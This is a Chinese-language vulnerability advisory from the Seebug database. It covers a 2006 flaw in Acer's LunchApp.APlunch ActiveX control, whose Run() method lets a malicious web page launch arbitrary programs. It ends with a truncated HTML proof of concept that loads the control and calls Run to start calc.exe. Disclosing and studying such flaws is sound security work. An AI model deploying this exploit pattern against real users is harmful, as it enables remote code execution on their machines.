Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:550
HistoryNov 21, 2006 - 12:00 a.m.

Acer LunchApp.APlunch ActiveX控件不安全Run方法漏洞

2006-11-2100:00:00
Root
www.seebug.org
12
JSON

LunchApp.APlunch是Acer笔记本默认所捆绑的一个ActiveX控件。

LunchApp.APlunch控件在处理用户输入参数时存在漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意程序。

LunchApp.APlunch控件中有一个名为Run()的方法,该方式支持Drive、FileName和CmdLine参数,如下所示:

[
uuid(D9998BCF-7957-11D2-8FED-00606730D3AA),
version(1.0),
hidden,
dual,
nonextensible
]
dispinterface _APlunch {
properties:
methods:
[id(0x60030000)]
void Run(
[in, out] BSTR* Drive,
[in, out] BSTR* FileName,
[in, out] BSTR* CmdLine);
};

如果用户受骗访问了恶意页面的话,Run()方式的最后一个参数就可能允许向可执行程序传送命令行参数,导致执行计算机上的任意程序。

Acer LunchApp.APlunch 1.0.0.0
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=“http://www.acer.com” target=“_blank”>http://www.acer.com</a>


                                                &lt;html&gt;
&lt;body&gt;
&lt;object classid=&quot;clsid:D9998BD0-7957-11D2-8FED-00606730D3AA&quot; id=&quot;hahaha&quot;&gt;
&lt;/object&gt;
&lt;script&gt;
hahaha.Run(&quot;c&quot;, &quot;\\windows\\system32\\calc.
JSON